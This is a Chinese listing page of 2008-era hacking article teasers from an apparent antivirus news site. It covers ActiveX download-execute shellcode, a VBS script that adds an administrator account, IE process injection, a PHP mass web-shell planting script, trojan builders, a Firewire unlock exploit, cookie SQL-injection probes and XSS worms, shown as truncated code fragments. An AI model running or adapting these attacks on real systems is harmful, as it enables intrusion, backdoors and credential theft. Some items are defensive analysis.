毒霸资讯 / 黑客动态_金山毒霸2008 免费下载杀毒软件全面病毒解决方案

RSS订阅 金山毒霸非官方通告:

2008-05-06 00:00:00ActiveX漏洞通用Exploit
终于在milw0rm找到了一个不错的shellcode，downexec的，灰常好用！顺手写了一个C测试了下，结果是成功下载并执行了"木马"，muma.exe是我用delphi写的一个简单的执行测试程序，无毒无害。 #include stdio.h #include string.h unsigned char shellcode[] = "xEBx54x8B... [阅读全文]
来源：作者：点击：12评论：7

2008-05-07 02:59:43程序从DOS/bios驻留内存到WINNT下监视读入内存数据
步骤：一层层HOOK,进入保护模式,打开页模式.... [阅读全文]
来源：作者：点击：21评论：18

1970-01-01 00:00:00让所有"暴力删除工具"无语的代码
来源：MJ0011内核研究所挑战一下，看谁的工具能删除它？用下面代码创建： PVOID buf = malloc(200000); WCHAR path [MAX_PATH] ; ZeroMemory(buf , 200000); GetSystemDirectoryW(path , MAX_PATH); wcscpy((wchar_t *)buf , L"\\?\C:\test"); CreateDirectoryW((... [阅读全文]
来源：作者：点击：7评论：0

2008-05-08 03:26:29用vbs加用户的绝妙方法
★ set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"wsnetwork.ComputerName Set ob=GetObject(os) ’得到adsi接口,绑定 Set oe=GetObject(os"/Administrators,group") ’属性,admin组 Set od=ob.Create("user","join") ’建立用户 od.SetPasswo... [阅读全文]
来源：作者：点击：5评论：0

2008-05-08 03:29:09一个Web网页下蠕虫的简单实现
在这之前先鄙视下一些人发现漏洞就挂马的无耻行为，我曾经因为一个公开的漏洞而在一个网站站上发现24个各个所谓组织，所谓黑客的后门，鄙视！所谓蠕虫，其本质是利用计算机或者应用程序的漏洞进行感染和传播的一段程序，传统的蠕虫一般利用系统方面的漏洞来实现自身的... [阅读全文]
来源：作者：点击：4评论：0

2008-05-08 03:31:18用VB编写一个加密软件
编写一个加密软件，要求将源文件按字节逐位倒排序加密法加密。字节逐位倒排序加密法是以比特为单位的换位加密方法，用VB实现的具体算法是： (1) 以二进制模式打开源文件； (2) 从源文件第I位读取一个字节，假设为字母“A”，得到“A”的ASCII值为65； (3) 将65转换成八... [阅读全文]
来源：作者：点击：12评论：0

2008-05-08 03:34:07知己知彼了解VB编写病毒的大体方法
相信电脑界的每个人都痛恨计算机病毒，她给我们带来了很多麻烦和损失，可你知道编写病毒的方法和过程吗？在此我仅以VB编写为例，揭开她的面纱。用VB编写病毒需要考虑到如下几点：感染主机首先染毒文件运行后先要判断主机是否以感染病毒，也就是判断病毒主体文件是否... [阅读全文]
来源：作者：点击：6评论：0

2008-05-08 03:35:27注入下载文件的代码到IE进程然后执行下载的文件
后门比较大下载的时候常常是网页暂停或是报错（CHM木马常遇到）所以写了这个程序。。。。 C:masm32BINtype ii.bat ml /c /coff i.asm link /subsystem:windows i.obj 刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。 ; #------------------... [阅读全文]
来源：作者：点击：7评论：0

2008-05-08 03:38:22在这里添加Edit控件密码窗口的秘密--一种全新的通用密码记录技术
*目前的各类密码记录技术* 目前各类密码记录程序多如牛毛,但实现原理无非有以下六个: 一:调用CreateRemoteThread函数远程DLL或代码注入. 二:调用SetWindowsHookEx安装键盘钩子记录按键,或是键盘驱动记录按键.(注五) 三:伪造登陆界面. 四:登录信息在网络传输过程中被嗅探... [阅读全文]
来源：作者：点击：10评论：0

1970-01-01 00:00:00逆向病毒nvmini.sys--编译通过--源码
/******************************************************************************************* * Module : nvmini.c * * Author : sudami [sudami@163.com] * Time : 08/02/28 * * Comment: * 去年7月份强悍的“马吉斯（Worm.Magistr）”病毒浓妆艳抹的登场,MS很强... [阅读全文]
来源：作者：点击：12评论：0

1970-01-01 00:00:00alpha2 shellcode解密的vbs脚本
alpha2 shellcode解密的vbs脚本 author:lcx fromhttp://hi.baidu.com/myvbscript/blog/item/bf7ce603b9a3e8733812bb44.html ’说明：只针对alpha2的TYIIIIIIIIIIIIIIII这样的加密来解密，没有做更多的容错处理，只是解出下载url的exe地址。一般情况下该url的加密字符串... [阅读全文]
来源：作者：点击：7评论：0

1970-01-01 00:00:00PHP批量挂马脚本
批量写入档案脚本...可以拿来挂马也能拿来当RFI的后门注入 code都写明的，有需要的请自己看后门写在$inj里面，要做base64 encode的Polymorphic 不希望这个东西被搞破坏的人拿去玩懂原理的就自个儿收下吧 ?php set_time_limit(0); ignore_user_abort(1); # PHP Mass I... [阅读全文]
来源：作者：点击：6评论：0

1970-01-01 00:00:00木马生成技术
作者：open 来源：open’s Blog 经常会看到鸽子或一些木马可以自定义生成一个服务端程序,开始很奇怪,他是怎么做到的!后来去网上搜了下,但是没找到相关文章! 后来碰巧得到了一个QQ病毒的源代码,而这个程序就可以生成一个文件,于是就研究了下代码,但是收获不大,但是很实用... [阅读全文]
来源：作者：点击：7评论：0

1970-01-01 00:00:00探索NDIS HOOK新的实现方法
作者：zhouxiaoyong (zhouhongyun1978_at_gmail.com) 来源：安全焦点 NDIS HOOK是专业级防火墙使用的一种拦截技术，NDIS HOOK的重点是如何获得特定协议对应NDIS_PROTOCOL_BLOCK指针，获得了该指针，接下来就可以替换该协议所注册的收发函数,而达到拦截网络数据的目的。... [阅读全文]
来源：作者：点击：7评论：0

1970-01-01 00:00:00普通恶意代码技术分析与检测
作者：fleshwound(fleshwound@smatrix.org) http://www.smatrix.org 来源：安全焦点 1 引言近些年来，恶意代码依赖一些特殊的Native API函数和内核系统函数进行感染、传播、隐藏的这种趋势愈加明显代码,并大量的使用了多重加密壳、驱动关联壳、变形壳等代码保护机制和... [阅读全文]
来源：作者：点击：7评论：0

1970-01-01 00:00:00用命令实现简单的连接—攻击
1、你得有流光，我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000，否则流光启动会失败! 什么是IPC： IPC是指"InterProcess Communications",准确的说是ipc$，是默... [阅读全文]
来源：作者：点击：3评论：0

1970-01-01 00:00:00一个暴Jsp源码的网页
head base target="_blank" /head style BODY {FONT-FAMILY: "宋体", "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt} BR {FONT-FAMILY: "宋体", "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt} TD {FONT-FAMILY: "宋体"; FONT-SIZE: 9pt; LINE-HEIGHT: 12pt} a {COLOR: #llc... [阅读全文]
来源：作者：点击：7评论：0

1970-01-01 00:00:00Firewire搞定你的WIN PC的攻击代码来了
在 http://hi.baidu.com/weiwang_blog/blog/item/8d5f2413791e7b846538dbd0.html 讲到这个东西，不久攻击代码就出来了。小心使用，风险自负。============================================ #!/usr/bin/python# Windows locked screen remote firewire unlockor# Metlst... [阅读全文]
来源：作者：点击：3评论：0

1970-01-01 00:00:00判断cookies注入的js语句
作者：lcx 来源：vbs小铺 javascript:alert(document.cookie="参数= " escape("参数值 and 1=1"));self.open("http:// "document.location.host document.location.pathname);void(0); javascript:alert(document.cookie="参数=" escape("参数值 and 1=2"));self.open("... [阅读全文]
来源：作者：点击：7评论：0

1970-01-01 00:00:00XSS漏洞导致的WEB蠕虫的实现
文章作者：Inking个人主页：http://www.inkings.cn 比较讨厌打字,我就简单的说一下吧.目标:学校自己写的论坛程序,经过了n年的风风雨雨了漏洞描述:转换ubb的任务是在客户端完成的(js),虽然论坛程序对客户端提交的代码进行了转义(如:"'等),但是却对ubb代码的属性的javascr... [阅读全文]
来源：作者：点击：7评论：0

首页上一页 1 23 4 5 6 7 下一页末页

推荐文章

热门文章

关于我们 - 联系我们 - 广告服务 - 法律声明 - RSS订阅 - 网站地图 - 返回顶部 -